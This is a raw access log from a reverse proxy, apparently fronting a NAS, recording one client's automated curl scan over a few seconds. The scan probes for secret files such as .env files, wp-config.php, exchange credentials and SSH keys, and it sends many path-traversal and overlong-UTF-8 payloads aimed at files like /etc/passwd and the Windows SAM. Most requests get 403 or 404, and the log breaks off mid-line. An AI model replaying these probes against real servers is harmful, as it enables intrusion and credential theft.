+[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/binance-credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/sidecar.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/config/database.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/akismet/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/docs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus-keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/routes/api.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/payments/qr_link_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/ws-broker?action=PATCH&target=/users/1/settings" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/configuration.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/etc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/admin/edit?id=3" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/Chart.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/payment_orchestrator/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/erc721/contracts/settings.sol" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/etc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/eset/settings.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/test/null" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/k8s-configmap.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:18 +0000] - 404 404 - GET https nas.profibot.hu "/settings.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/oracle/cloud/smtp_gateway.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/wp-signup.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/config/view.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/set/role?user=2&role=admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/global.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/jetson/config.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/oauth2/token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/metrics" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/admin/roles/3" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/install.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/mockapi/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/users.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/postmark.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/ms/entrypoints/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - - 403 - GET https nas.profibot.hu "/?source=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/sasl/settings.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/etc/zimbra/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/web3/tokenmap.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/pub/errors/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/backend/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:19 +0000] - 404 404 - GET https nas.profibot.hu "/drone/mission.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/usr/share/webmin/postfix/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/api.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/config/payment_processor.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/pos/terminal_profiles.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 403 403 - GET https nas.profibot.hu "/internal/config/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/electron-builder.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 403 403 - GET https nas.profibot.hu "/.theia/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/odoo/odoo.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 403 403 - GET https nas.profibot.hu "/.stylelintrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/settings.gradle" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/config/pages" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/relay.hosting/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 403 403 - GET https nas.profibot.hu "/.env.backup" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/graphql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/pm2.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/includes/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/sklearn_pipeline.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/demo/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/linkerd/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:20 +0000] - 404 404 - GET https nas.profibot.hu "/public/storage/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/haproxy.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/tmp/cache/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/usr/lib/courier/etc/esmtpd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/tpu/parameters.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/hardware/paymentdevice_settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/jobs/secret.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 403 403 - GET https nas.profibot.hu "/contracts/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/api/token/refresh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/config/experiment.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/admin/setup" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/session/jwt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/etc/conf.d/mail-client" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/twocheckout/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/litecoin/litecoin.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/tmp/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/marketplace/payment_split_rules.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/monitoring/check?host=..." [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/secrets/config.gpg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:21 +0000] - 404 404 - GET https nas.profibot.hu "/async/email_dispatcher.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/mlflow.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/consul.hcl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/etc/dovecot/dovecot.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/admin/mail/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/debug_builds/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/config/email.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/nix/config.nix" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/rules/decision_engine.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/pubsub/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/veracode_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/istio/sidecar-injector-configmap.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/coldfusion/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/simulator/settings.plist" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/admin/metadata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "///////var/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/:6379" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/magento_admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 403 403 - GET https nas.profibot.hu "/.web3auth/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:22 +0000] - 404 404 - GET https nas.profibot.hu "/stripe.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/cert.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/sw-config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/abtest/variants.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/payments/engine/routing_rules.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/promtail.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - - 403 - GET https 